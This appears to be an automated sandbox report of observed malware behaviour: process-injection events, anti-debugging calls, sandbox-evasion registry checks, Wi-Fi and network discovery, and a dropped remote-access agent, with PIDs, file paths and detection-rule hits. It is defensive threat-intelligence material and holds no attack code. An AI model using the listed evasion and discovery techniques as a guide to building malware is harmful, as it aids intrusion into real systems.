description ioc Process File opened for modification C:\Windows\System32\Tasks\UAC svchost.exe File opened for modification C:\Windows\SysWOW64\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\combase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\apphelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\combase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\system32\MRT.exe LB31.exe File opened for modification C:\Windows\SysWOW64\DLL\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\combase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\apphelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\apphelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shcore.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wkernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wuser32.pdb MeshAgent.exe -
Enumerates processes with tasklist 1 TTPs 12 IoCs
pid Process 6200 tasklist.exe 6944 tasklist.exe 4864 tasklist.exe 7968 tasklist.exe 8244 tasklist.exe 5980 tasklist.exe 8196 tasklist.exe 6636 tasklist.exe 7216 tasklist.exe 7324 tasklist.exe 6652 tasklist.exe 7024 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 3084 Client_protected.exe 4028 rh.exe 7468 L.exe -
Suspicious use of SetThreadContext 29 IoCs
description pid Process procid_target PID 1432 set thread context of 3756 1432 9758xBqgE1azKnB.exe 222 PID 5328 set thread context of 5556 5328 vg9qcBa.exe 327 PID 1084 set thread context of 7024 1084 Armanivenntii_crypted_EASY.exe 333 PID 6776 set thread context of 5648 6776 crypted8888.exe 340 PID 7132 set thread context of 6844 7132 Restructuring.pif 371 PID 5564 set thread context of 1788 5564 postbox.exe 390 PID 6512 set thread context of 6536 6512 Updater.vbs.exe 391 PID 6384 set thread context of 5744 6384 computerlead.exe 383 PID 5688 set thread context of 6148 5688 7mpPLxE.exe 442 PID 5800 set thread context of 8148 5800 Opdxdyeul.exe 499 PID 7188 set thread context of 7644 7188 Reynolds.com 515 PID 7644 set thread context of 7360 7644 Reynolds.com 528 PID 7616 set thread context of 7352 7616 Possibly.pif 536 PID 6660 set thread context of 7080 6660 LB31.exe 556 PID 7304 set thread context of 4384 7304 Mig.exe 589 PID 7304 set thread context of 3716 7304 Mig.exe 590 PID 7304 set thread context of 2968 7304 Mig.exe 595 PID 5132 set thread context of 4104 5132 cqibun.exe 601 PID 6128 set thread context of 2764 6128 9758xBqgE1azKnB.exe 620 PID 6624 set thread context of 1932 6624 cqibun.exe 630 PID 1920 set thread context of 7540 1920 cqibun.exe 643 PID 3152 set thread context of 9928 3152 caspol.exe 651 PID 7032 set thread context of 9288 7032 Possibly.pif 736 PID 6028 set thread context of 10200 6028 whiteheroin.exe 744 PID 748 set thread context of 2556 748 Reynolds.com 746 PID 8124 set thread context of 3092 8124 cqibun.exe 749 PID 9224 set thread context of 5600 9224 Sniffthem.exe 764 PID 9224 set thread context of 4896 9224 Sniffthem.exe 763 PID 9224 set thread context of 7296 9224 Sniffthem.exe 765 -
resource yara_rule behavioral1/files/0x002d00000004534f-12248.dat upx -
Drops file in Program Files directory 10 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\d75b00c9-86a3-411f-9853-c2e352bce808.tmp setup.exe File created C:\Program Files (x86)\MountTaiSoftware\Lodop\NPCAOSOFT_WEB_PRINT_lodop.dll install_lodop32.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.msh MeshAgent.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241127004007.pma setup.exe File created C:\Program Files (x86)\MountTaiSoftware\Lodop\CAOSOFT_WEB_PRINT_lodop.ocx install_lodop32.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.exe meshagent32-group.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe -
Drops file in Windows directory 33 IoCs
description ioc Process File opened for modification C:\Windows\Tasks\UAC.job svchost.exe File opened for modification C:\Windows\PermitLite PharmaciesDetection.exe File opened for modification C:\Windows\JennyArtistic PharmaciesDetection.exe File opened for modification C:\Windows\TeddySecretariat 0fVlNye.exe File opened for modification C:\Windows\CentralAvoiding 0fVlNye.exe File opened for modification C:\Windows\OrganDiscretion 0fVlNye.exe File opened for modification C:\Windows\CameroonBuses ConsiderableWinners.exe File opened for modification C:\Windows\VatBukkake 0fVlNye.exe File opened for modification C:\Windows\PossessDescriptions ConsiderableWinners.exe File opened for modification C:\Windows\ConsolidationDistinct ConsiderableWinners.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\GeniusRepeat PharmaciesDetection.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\XiMilton PharmaciesDetection.exe File opened for modification C:\Windows\JoiningMazda 0fVlNye.exe File opened for modification C:\Windows\MozambiqueAppropriate 0fVlNye.exe File created C:\Windows\Tasks\UAC.job schtasks.exe File opened for modification C:\Windows\TrainsSexcam PharmaciesDetection.exe File opened for modification C:\Windows\GamingNat PharmaciesDetection.exe File opened for modification C:\Windows\UruguayNorthern 0fVlNye.exe File opened for modification C:\Windows\IdeasApp 0fVlNye.exe File created C:\Windows\Tasks\Test Task17.job Opdxdyeul.exe File opened for modification C:\Windows\PolyphonicWeblog PharmaciesDetection.exe File opened for modification C:\Windows\DownReceptor 0fVlNye.exe File opened for modification C:\Windows\ComfortSick 0fVlNye.exe File opened for modification C:\Windows\BackedIma ConsiderableWinners.exe File opened for modification C:\Windows\SgLaid PharmaciesDetection.exe File opened for modification C:\Windows\MissWheat PharmaciesDetection.exe File opened for modification C:\Windows\FlickrRealm ConsiderableWinners.exe File opened for modification C:\Windows\FacingLone PharmaciesDetection.exe File opened for modification C:\Windows\EditedRights PharmaciesDetection.exe File opened for modification C:\Windows\KeyboardsTwin 0fVlNye.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 6536 sc.exe 6644 sc.exe 5916 sc.exe 6792 sc.exe 5936 sc.exe 7760 sc.exe 5976 sc.exe 116 sc.exe 5356 sc.exe 1152 sc.exe 6672 sc.exe 7556 sc.exe 6624 sc.exe 3352 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 3656 mshta.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x002c00000004535a-12442.dat pyinstaller -
Embeds OpenSSL 2 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral1/files/0x0033000000045386-14012.dat embeds_openssl behavioral1/files/0x0034000000045339-14036.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 5 IoCs
pid pid_target Process procid_target 3092 3084 WerFault.exe 241 2436 5744 WerFault.exe 383 5940 4028 WerFault.exe 503 9324 9600 WerFault.exe 658 10664 10488 WerFault.exe 872 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language computerlead.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7mpPLxE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Installeraus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cqibun.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted8888.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stail.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ARP.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_regiis.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language main.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language install_lodop32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 25072023.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Opdxdyeul.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tftp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cqibun.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0fVlNye.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_frap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 26 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 10776 PING.EXE 10992 PING.EXE 10948 PING.EXE 892 PING.EXE 10692 PING.EXE 8072 PING.EXE 3664 PING.EXE 11200 PING.EXE 7852 PING.EXE 3388 PING.EXE 8104 PING.EXE 4428 PING.EXE 4308 PING.EXE 1792 PING.EXE 1548 PING.EXE 8736 PING.EXE 11136 PING.EXE 4208 PING.EXE 1212 PING.EXE 10056 PING.EXE 1492 PING.EXE 7212 PING.EXE 10584 PING.EXE 9944 PING.EXE 3636 PING.EXE 4868 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 7192 cmd.exe 8072 netsh.exe -
NSIS installer 3 IoCs
resource yara_rule behavioral1/files/0x00280000000450d6-2180.dat nsis_installer_2 behavioral1/files/0x002900000004527a-5488.dat nsis_installer_1 behavioral1/files/0x002900000004527a-5488.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe -
Checks processor information in registry 2 TTPs 27 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5_6190317556063017550.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Buyer.pif Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5_6190317556063017550.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build_2024-07-27_00-41.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build_2024-07-27_00-41.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Buyer.pif Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 6576 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2600 wmic.exe -
Discovers systems in the same network 1 TTPs 2 IoCs
pid Process 9676 net.exe 9908 net.exe -
Enumerates system info in registry 2 TTPs 40 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Kills process with taskkill 2 IoCs
pid Process 3592 taskkill.exe 7472 taskkill.exe -
